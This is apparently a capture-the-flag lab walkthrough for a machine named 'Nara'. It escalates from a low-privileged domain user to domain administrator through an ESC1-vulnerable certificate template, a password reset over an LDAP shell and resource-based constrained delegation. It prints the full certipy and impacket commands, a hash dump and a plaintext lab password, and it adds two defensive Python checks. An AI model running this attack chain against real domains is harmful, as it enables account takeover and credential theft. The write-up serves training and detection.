ADCS


A vulnerable certificate template has been identified: NaraUser. The vulnerability is ESC1.

ESC1


ESC1 is a misconfiguration of a certificate template in Active Directory Certificate Services (AD CS). A template is ESC1-vulnerable when low-privileged users hold enrollment rights, the template's EKU permits client authentication, no manager approval or authorized signature is required, and, critically, the enrollee is allowed to supply the subject of the request. Under those conditions any authenticated user can request a certificate whose subject alternative name carries the UPN of an arbitrary account, such as a domain administrator, and then use that certificate to authenticate as that account and escalate privileges. This is especially dangerous when templates are left with default or improperly configured settings.
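As an added example (not certipy's code and not part of the original write-up), the following audits template records for the five ESC1 conditions just described. The records are constructed sample data shaped like the LDAP attributes of a pKICertificateTemplate object, and the enrollment-sids list is assumed to have been extracted from each template's nTSecurityDescriptor beforehand.

```python
"""Audit certificate templates for the ESC1 conditions (added example, not certipy's code).

Each record mirrors the LDAP attributes of a pKICertificateTemplate object under
CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,...;
'enrollment-sids' is assumed to have been pre-extracted from the template's
nTSecurityDescriptor (SIDs holding the Enroll extended right). Whether the template
is actually published on a CA is a separate check not modelled here.
"""

# msPKI-Certificate-Name-Flag: the requester supplies the subject / SAN of the request
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001
# msPKI-Enrollment-Flag: issuance is held for CA manager approval
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002

# EKU OIDs that let the resulting certificate authenticate to the domain
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}

WELL_KNOWN_LOW_PRIV = {"S-1-1-0", "S-1-5-11"}   # Everyone, Authenticated Users
LOW_PRIV_DOMAIN_RIDS = {"513", "515"}           # Domain Users, Domain Computers


def is_low_privileged(sid: str) -> bool:
    """True for principals that effectively mean 'any domain account'."""
    if sid in WELL_KNOWN_LOW_PRIV:
        return True
    return sid.startswith("S-1-5-21-") and sid.rsplit("-", 1)[-1] in LOW_PRIV_DOMAIN_RIDS


def esc1_reasons(t: dict) -> list[str]:
    """Return the ESC1 conditions a template meets, or [] unless it meets all of them."""
    ekus = set(t["pKIExtendedKeyUsage"])
    checks = [
        (bool(t["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT),
         "enrollee supplies the subject, so the SAN can name any UPN"),
        (not ekus or bool(ekus & AUTH_EKUS),
         "EKU permits client authentication"),
        (not t["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS,
         "no CA manager approval required"),
        (t["msPKI-RA-Signature"] == 0,
         "no authorized signatures required"),
        (any(is_low_privileged(s) for s in t["enrollment-sids"]),
         "low-privileged principals hold enrollment rights"),
    ]
    # ESC1 needs every condition at once; a template missing any one is not ESC1
    return [msg for ok, msg in checks] if all(ok for ok, _ in checks) else []


def audit_templates(templates: list[dict]) -> dict[str, list[str]]:
    """Map each vulnerable template name to the reasons it is flagged."""
    return {t["name"]: r for t in templates if (r := esc1_reasons(t))}


DOMAIN_SID = "S-1-5-21-914744703-3800712539-3320214069"   # domain SID from the write-up's output

# Constructed sample records (attribute values are illustrative, not read from the lab)
SAMPLE_TEMPLATES = [
    {   # a user template misconfigured the way the write-up's NaraUser behaves
        "name": "NaraUser",
        "msPKI-Certificate-Name-Flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
        "msPKI-Enrollment-Flag": 0,
        "msPKI-RA-Signature": 0,
        "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2", "1.3.6.1.5.5.7.3.4"],
        "enrollment-sids": [f"{DOMAIN_SID}-513", f"{DOMAIN_SID}-512"],
    },
    {   # same template remediated: the CA builds the subject from AD (default User flags)
        "name": "NaraUser-fixed",
        "msPKI-Certificate-Name-Flag": 0xA6000000,
        "msPKI-Enrollment-Flag": 0,
        "msPKI-RA-Signature": 0,
        "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2", "1.3.6.1.5.5.7.3.4"],
        "enrollment-sids": [f"{DOMAIN_SID}-513"],
    },
    {   # enrollee-supplied subject, but gated by manager approval and restricted enrollers
        "name": "WebServer-custom",
        "msPKI-Certificate-Name-Flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
        "msPKI-Enrollment-Flag": CT_FLAG_PEND_ALL_REQUESTS,
        "msPKI-RA-Signature": 0,
        "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.1"],
        "enrollment-sids": [f"{DOMAIN_SID}-512"],
    },
]

if __name__ == "__main__":
    for name, reasons in audit_templates(SAMPLE_TEMPLATES).items():
        print(f"[ESC1] {name}: " + "; ".join(reasons))
```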

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nara]
└─$ KRB5CCNAME=tracy.white@nara.nara-security.com.ccache certipy-ad -debug req -template 'NaraUser' -ca 'NARA-CA' -upn administrator@nara-security.com -target nara -k -no-pass -ns $IP -target-ip $IP -dc-ip $IP -dc-host nara.nara-security.com
Certipy v5.0.2 - by Oliver Lyak (ly4k)
 
[+] Domain retrieved from CCache: NARA-SECURITY.COM
[+] Username retrieved from CCache: tracy.white
[+] Nameserver: '192.168.209.30'
[+] DC IP: '192.168.209.30'
[+] DC Host: 'nara.nara-security.com'
[+] Target IP: '192.168.209.30'
[+] Remote Name: 'nara'
[+] Domain: 'NARA-SECURITY.COM'
[+] Username: 'TRACY.WHITE'
[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Checking for Kerberos ticket cache
[+] Loaded Kerberos cache from tracy.white@nara.nara-security.com.ccache
[+] Using TGT from cache
[+] Username retrieved from CCache credential: tracy.white
[+] Getting TGS for 'HOST/nara'
[+] Got TGS for 'HOST/nara'
[+] Trying to connect to endpoint: ncacn_np:192.168.209.30[\pipe\cert]
[+] Connected to endpoint: ncacn_np:192.168.209.30[\pipe\cert]
[*] Request ID is 16
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator@nara-security.com'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[+] Attempting to write data to 'administrator.pfx'
[+] Data written to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'

Successfully requested a certificate from the NaraUser template with the administrator UPN in the SAN; a PFX file was generated for the administrator user.

Authentication (PKINIT Fail)


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nara]
└─$ certipy-ad -debug auth -pfx administrator.pfx -domain NARA-SECURITY.COM -dc-ip $IP 
Certipy v5.0.2 - by Oliver Lyak (ly4k)
 
[+] Target name (-target) and DC host (-dc-host) not specified. Using domain '' as target name. This might fail for cross-realm operations
[+] Nameserver: '192.168.209.30'
[+] DC IP: '192.168.209.30'
[+] DC Host: ''
[+] Target IP: '192.168.209.30'
[+] Remote Name: '192.168.209.30'
[+] Domain: ''
[+] Username: ''
[*] Certificate identities:
[*]     SAN UPN: 'administrator@nara-security.com'
[*] Using principal: 'administrator@nara-security.com'
[*] Trying to get TGT...
[+] Sending AS-REQ to KDC nara-security.com (192.168.209.30)
[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)
Traceback (most recent call last):
  File "/usr/lib/python3/dist-packages/certipy/commands/auth.py", line 596, in kerberos_authentication
    tgt = sendReceive(as_req, domain, self.target.target_ip)
  File "/usr/lib/python3/dist-packages/impacket/krb5/kerberosv5.py", line 93, in sendReceive
    raise krbError
impacket.krb5.kerberosv5.KerberosError: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)
[-] See the wiki for more information

Attempting to authenticate with the administrator user's PFX file fails with KDC_ERR_PADATA_TYPE_NOSUPP.

The KDC_ERR_PADATA_TYPE_NOSUPP error means that the target KDC is not configured to support PKINIT authentication (Kerberos authentication with a certificate).

Authentication (LDAP Shell)


The target KDC not supporting PKINIT does not mean the generated PFX file is invalid: the certificate can still be used for Schannel (TLS client certificate) authentication against LDAPS. One way to verify this is the -ldap-shell flag of certipy-ad.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nara]
└─$ certipy-ad -debug auth -pfx administrator.pfx -domain NARA-SECURITY.COM -dc-ip $IP -ldap-shell
Certipy v5.0.2 - by Oliver Lyak (ly4k)
 
[+] Target name (-target) and DC host (-dc-host) not specified. Using domain '' as target name. This might fail for cross-realm operations
[+] Nameserver: '192.168.209.30'
[+] DC IP: '192.168.209.30'
[+] DC Host: ''
[+] Target IP: '192.168.209.30'
[+] Remote Name: '192.168.209.30'
[+] Domain: ''
[+] Username: ''
[*] Certificate identities:
[*]     SAN UPN: 'administrator@nara-security.com'
[+] Authenticating to LDAP server using Schannel authentication
[*] Connecting to 'ldaps://192.168.209.30:636'
[*] Authenticated to '192.168.209.30' as: 'u:NARASEC\\Administrator'
[+] Bound to ldaps://192.168.209.30:636 - ssl
[+] Default path: DC=nara-security,DC=com
[+] Configuration path: CN=Configuration,DC=nara-security,DC=com
Type help for list of commands
 
# 

LDAP shell session established over LDAPS using Schannel authentication.

# whoami
u:NARASEC\Administrator

The current user is Administrator.

Password Reset


# help
 
 add_computer computer [password] [nospns] - Adds a new computer to the domain with the specified password. If nospns is specified, computer will be created with only a single necessary HOST SPN. Requires LDAPS.
 rename_computer current_name new_name - Sets the SAMAccountName attribute on a computer object to a new value.
 add_user new_user [parent] - Creates a new user.
 add_user_to_group user group - Adds a user to a group.
 change_password user [password] - Attempt to change a given user's password. Requires LDAPS.
 clear_rbcd target - Clear the resource based constrained delegation configuration information.
 disable_account user - Disable the user's account.
 enable_account user - Enable the user's account.
 dump - Dumps the domain.
 search query [attributes,] - Search users and groups by name, distinguishedName and sAMAccountName.
 get_user_groups user - Retrieves all groups this user is a member of.
 get_group_users group - Retrieves all members of a group.
 get_laps_password computer - Retrieves the LAPS passwords associated with a given computer (sAMAccountName).
 grant_control target grantee - Grant full control of a given target object (sAMAccountName) to the grantee (sAMAccountName).
 set_dontreqpreauth user true/false - Set the don't require pre-authentication flag to true or false.
 set_rbcd target grantee - Grant the grantee (sAMAccountName) the ability to perform RBCD to the target (sAMAccountName).
 start_tls - Send a StartTLS command to upgrade from LDAP to LDAPS. Use this to bypass channel binding for operations necessitating an encrypted channel.
 write_gpo_dacl user gpoSID - Write a full control ACE to the gpo for the given user. The gpoSID must be entered surrounding by {}.
 whoami - get connected user
 dirsync - Dirsync requested attributes
 exit - Terminates this session.

There are many ways to go from here. The simplest is to reset the password of the administrator user.

# change_password administrator Qwer1234
Got User DN: CN=Administrator,CN=Users,DC=nara-security,DC=com
Attempting to set new password of: Qwer1234
Password changed successfully!

Password successfully changed for the administrator user: Qwer1234

Validation

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nara]
└─$ impacket-getTGT NARA-SECURITY.COM/administrator@nara.nara-security.com -dc-ip $IP         
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 
 
Password: Qwer1234
[*] Saving ticket in administrator@nara.nara-security.com.ccache

Validated against the KDC running on the DC host nara.nara-security.com (192.168.209.30): a TGT was generated for the administrator user.

Hashdump

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nara]
└─$ KRB5CCNAME=administrator@nara.nara-security.com.ccache impacket-secretsdump NARA-SECURITY.COM/@nara.nara-security.com -k -no-pass -dc-ip $IP
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 
 
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x731c888adb6f9f25711d55f1c1463b88
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d35c4ae45bdd10a4e28ff529a2155745:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
NARASEC\NARA$:aad3b435b51404eeaad3b435b51404ee:d78b968a49f9612f83797d3138220092:::
[*] DefaultPassword 
NARASEC\tracy.white:zqwj041FGX
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xa2966c2958c321ccc4470b54f485be069a050bc1
dpapi_userkey:0x5a6ed63075d897d7d3224c2c9b9cdcc254788003
[*] NL$KM 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[*] Cleaning up... 
[*] Stopping service RemoteRegistry

Domain level compromise

Shell Drop

System level compromise

RBCD (Resource-based Constrained Delegation)


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nara]
└─$ certipy-ad -debug auth -pfx administrator.pfx -domain NARA-SECURITY.COM -dc-ip $IP -ldap-shell
Certipy v5.0.2 - by Oliver Lyak (ly4k)
 
[+] Target name (-target) and DC host (-dc-host) not specified. Using domain '' as target name. This might fail for cross-realm operations
[+] Nameserver: '192.168.209.30'
[+] DC IP: '192.168.209.30'
[+] DC Host: ''
[+] Target IP: '192.168.209.30'
[+] Remote Name: '192.168.209.30'
[+] Domain: ''
[+] Username: ''
[*] Certificate identities:
[*]     SAN UPN: 'administrator@nara-security.com'
[+] Authenticating to LDAP server using Schannel authentication
[*] Connecting to 'ldaps://192.168.209.30:636'
[*] Authenticated to '192.168.209.30' as: 'u:NARASEC\\Administrator'
[+] Bound to ldaps://192.168.209.30:636 - ssl
[+] Default path: DC=nara-security,DC=com
[+] Configuration path: CN=Configuration,DC=nara-security,DC=com
Type help for list of commands
 

There are many ways to go from here. Another method is to abuse RBCD (Resource-based Constrained Delegation).

Adding Computer

# add_computer RBCD Qwer1234
Attempting to add a new computer with the name: RBCD$
Inferred Domain DN: DC=nara-security,DC=com
Inferred Domain Name: nara-security.com
New Computer DN: CN=RBCD,CN=Computers,DC=nara-security,DC=com
Adding new computer with username: RBCD$ and password: Qwer1234 result: OK

A computer account was created: RBCD$ with the password Qwer1234.

Setting RBCD

# set_rbcd NARA$ RBCD$
Found Target DN: CN=NARA,OU=Domain Controllers,DC=nara-security,DC=com
Target SID: S-1-5-21-914744703-3800712539-3320214069-1000
 
Found Grantee DN: CN=RBCD,CN=Computers,DC=nara-security,DC=com
Grantee SID: S-1-5-21-914744703-3800712539-3320214069-4601
Delegation rights modified successfully!
RBCD$ can now impersonate users on NARA$ via S4U2Proxy

RBCD configured successfully: RBCD$ is now allowed to act on behalf of other identities towards NARA$.

Requesting Service Ticket (Impersonation)

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nara]
└─$ impacket-getTGT 'NARA-SECURITY.COM/RBCD$@nara.nara-security.com' -dc-ip $IP                      
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 
 
Password: Qwer1234
[*] Saving ticket in RBCD$@nara.nara-security.com.ccache

Validated against the KDC running on the DC host nara.nara-security.com (192.168.209.30): a TGT was generated for the newly created computer account RBCD$.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nara]
└─$ KRB5CCNAME=RBCD\$@nara.nara-security.com.ccache impacket-getST 'NARA-SECURITY.COM/RBCD$@nara.nara-security.com' -k -no-pass -spn DNS/nara.nara-security.com -impersonate administrator -dc-ip $IP -debug  
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 
 
[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
[+] Using Kerberos Cache: RBCD$@nara.nara-security.com.ccache
[+] Returning cached credential for KRBTGT/NARA-SECURITY.COM@NARA-SECURITY.COM
[+] Using TGT from cache
[+] Username retrieved from CCache: RBCD$
[*] Impersonating administrator
[+] AUTHENTICATOR
Authenticator:
 authenticator-vno=5
 crealm=NARA-SECURITY.COM
 cname=PrincipalName:
  name-type=1
  name-string=SequenceOf:
   RBCD$
 
 cusec=681954
 ctime=20250701171149Z
 
 
 
[+] S4UByteArray
 0000   01 00 00 00 61 64 6D 69  6E 69 73 74 72 61 74 6F   ....administrato
 0010   72 4E 41 52 41 2D 53 45  43 55 52 49 54 59 2E 43   rNARA-SECURITY.C
 0020   4F 4D 4B 65 72 62 65 72  6F 73                     OMKerberos
[+] CheckSum
 0000   09 39 EB E9 70 D3 DF BC  2B 6F 25 24 A1 E1 FA D9   .9..p...+o%$....
[+] PA_FOR_USER_ENC
PA_FOR_USER_ENC:
 userName=PrincipalName:
  name-type=1
  name-string=SequenceOf:
   administrator
 
 userRealm=NARA-SECURITY.COM
 cksum=Checksum:
  cksumtype=-138
  checksum=0x0939ebe970d3dfbc2b6f2524a1e1fad9
 
 auth-package=Kerberos
 
[+] Final TGS
TGS_REQ:
 pvno=5
 msg-type=12
 padata=SequenceOf:
  PA_DATA:
   padata-type=1
   padata-value=[...]
  PA_DATA:
   padata-type=129
   padata-value=0x305ba01a3018a003020101a111300f1b0d61646d696e6973747261746f72a1131b114e4152412d53454355524954592e434f4da21c301aa0040202ff76a11204100939ebe970d3dfbc2b6f2524a1e1fad9a30a1b084b65726265726f73
 
 req-body=KDC_REQ_BODY:
  kdc-options=1082195968
  realm=NARA-SECURITY.COM
  sname=PrincipalName:
   name-type=0
   name-string=SequenceOf:
    RBCD$
 
  till=20250702171149Z
  nonce=859755210
  etype=SequenceOf:
   18   23
 
 
[*] Requesting S4U2self
[+] Trying to connect to KDC at 192.168.209.30:88
[+] TGS_REP
TGS_REP:
 pvno=5
 msg-type=13
 crealm=NARA-SECURITY.COM
 cname=PrincipalName:
  name-type=1
  name-string=SequenceOf:
   administrator
 
 ticket=Ticket:
  tkt-vno=5
  realm=NARA-SECURITY.COM
  sname=PrincipalName:
   name-type=0
   name-string=SequenceOf:
    RBCD$
 
  enc-part=EncryptedData:
   etype=23
   kvno=1
   cipher=[...]
 
 
 enc-part=EncryptedData:
  etype=18
  cipher=[...]
 
 
[*] Requesting S4U2Proxy
[+] Trying to connect to KDC at 192.168.209.30:88
[*] Saving ticket in administrator@DNS_nara.nara-security.com@NARA-SECURITY.COM.ccache

Success: the S4U2self and S4U2proxy exchange returned a service ticket for DNS/nara.nara-security.com as administrator, saved as administrator@DNS_nara.nara-security.com@NARA-SECURITY.COM.ccache.
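The set_rbcd step above writes a security descriptor into the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of NARA$, and the S4U2proxy request then relies on it. As an added example (not part of the write-up, nor impacket's or certipy's code), the following decodes that raw attribute and reports which SIDs may act on behalf of the object, which is how a defender would spot such an entry on a domain controller. The descriptor is constructed in code with a minimal builder so the example runs offline; in practice the attribute is read from the computer object over LDAP.

```python
"""Decode msDS-AllowedToActOnBehalfOfOtherIdentity and list who may delegate to the object.

Added example, not from the write-up, impacket or certipy. The attribute holds a
self-relative SECURITY_DESCRIPTOR; each ACCESS_ALLOWED ACE in its DACL names a
principal that may obtain service tickets to this object on behalf of other users
(S4U2proxy). The descriptor used below is constructed in code; in practice it is
read from the computer object over LDAP.
"""
import struct

ACCESS_ALLOWED_ACE_TYPE = 0
SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
SD_HEADER = "<BBHIIII"   # Revision, Sbz1, Control, OffsetOwner, OffsetGroup, OffsetSacl, OffsetDacl
ACL_HEADER = "<BBHHH"    # AclRevision, Sbz1, AclSize, AceCount, Sbz2
ACE_HEADER = "<BBHI"     # AceType, AceFlags, AceSize, Mask


def build_sid(sid: str) -> bytes:
    """Serialise 'S-1-5-21-...' into the binary SID layout used inside ACEs."""
    parts = sid.split("-")
    rev, authority, subs = int(parts[1]), int(parts[2]), [int(p) for p in parts[3:]]
    return (struct.pack("<BB", rev, len(subs)) + authority.to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def parse_sid(buf: bytes, off: int) -> tuple[str, int]:
    """Decode a binary SID at buf[off:]; returns (string form, bytes consumed)."""
    rev, count = struct.unpack_from("<BB", buf, off)
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    return "S-%d-%d" % (rev, authority) + "".join("-%d" % s for s in subs), 8 + 4 * count


def build_rbcd_descriptor(grantee_sids: list[str]) -> bytes:
    """Constructed fixture: a DACL-only descriptor granting full control to each SID
    (owner and group offsets are left 0; the parser below does not need them)."""
    aces = b""
    for sid in grantee_sids:
        sid_bytes = build_sid(sid)
        aces += struct.pack(ACE_HEADER, ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(sid_bytes), 0x000F01FF) + sid_bytes
    acl = struct.pack(ACL_HEADER, 2, 0, 8 + len(aces), len(grantee_sids), 0) + aces
    header_len = struct.calcsize(SD_HEADER)
    return struct.pack(SD_HEADER, 1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE, 0, 0, 0, header_len) + acl


def rbcd_grantees(descriptor: bytes) -> list[str]:
    """SIDs named by ACCESS_ALLOWED ACEs in the DACL; [] when no DACL is present."""
    _rev, _sbz, control, _owner, _group, _sacl, dacl_off = struct.unpack_from(SD_HEADER, descriptor, 0)
    if not control & SE_DACL_PRESENT or dacl_off == 0:
        return []
    _arev, _asbz, _asize, ace_count, _asbz2 = struct.unpack_from(ACL_HEADER, descriptor, dacl_off)
    off = dacl_off + struct.calcsize(ACL_HEADER)
    sids = []
    for _ in range(ace_count):
        ace_type, _flags, ace_size, _mask = struct.unpack_from(ACE_HEADER, descriptor, off)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            sids.append(parse_sid(descriptor, off + struct.calcsize(ACE_HEADER))[0])
        off += ace_size   # AceSize lets us skip ACE types we do not decode
    return sids


def unexpected_grantees(descriptor: bytes, approved: set[str]) -> list[str]:
    """Grantees not on the approved list; on a domain controller any hit deserves a look."""
    return [s for s in rbcd_grantees(descriptor) if s not in approved]


# Grantee SID as printed by the write-up's set_rbcd step (RBCD$); the descriptor itself is constructed
RBCD_SID = "S-1-5-21-914744703-3800712539-3320214069-4601"
NARA_DESCRIPTOR = build_rbcd_descriptor([RBCD_SID])

if __name__ == "__main__":
    print("principals allowed to delegate to NARA$:", rbcd_grantees(NARA_DESCRIPTOR))
    print("unexpected:", unexpected_grantees(NARA_DESCRIPTOR, approved=set()))
```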

Hashdump (RBCD)

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nara]
└─$ KRB5CCNAME=administrator@DNS_nara.nara-security.com@NARA-SECURITY.COM.ccache impacket-secretsdump NARA-SECURITY.COM/@nara.nara-security.com -k -no-pass -dc-ip $IP 
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 
 
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x731c888adb6f9f25711d55f1c1463b88
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d35c4ae45bdd10a4e28ff529a2155745:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
NARASEC\NARA$:aad3b435b51404eeaad3b435b51404ee:d78b968a49f9612f83797d3138220092:::
[*] DefaultPassword 
NARASEC\tracy.white:zqwj041FGX
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xa2966c2958c321ccc4470b54f485be069a050bc1
dpapi_userkey:0x5a6ed63075d897d7d3224c2c9b9cdcc254788003
[*] NL$KM 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[*] Cleaning up... 
[*] Stopping service RemoteRegistry

Domain level compromise

Shell Drop (RBCD)

System level compromise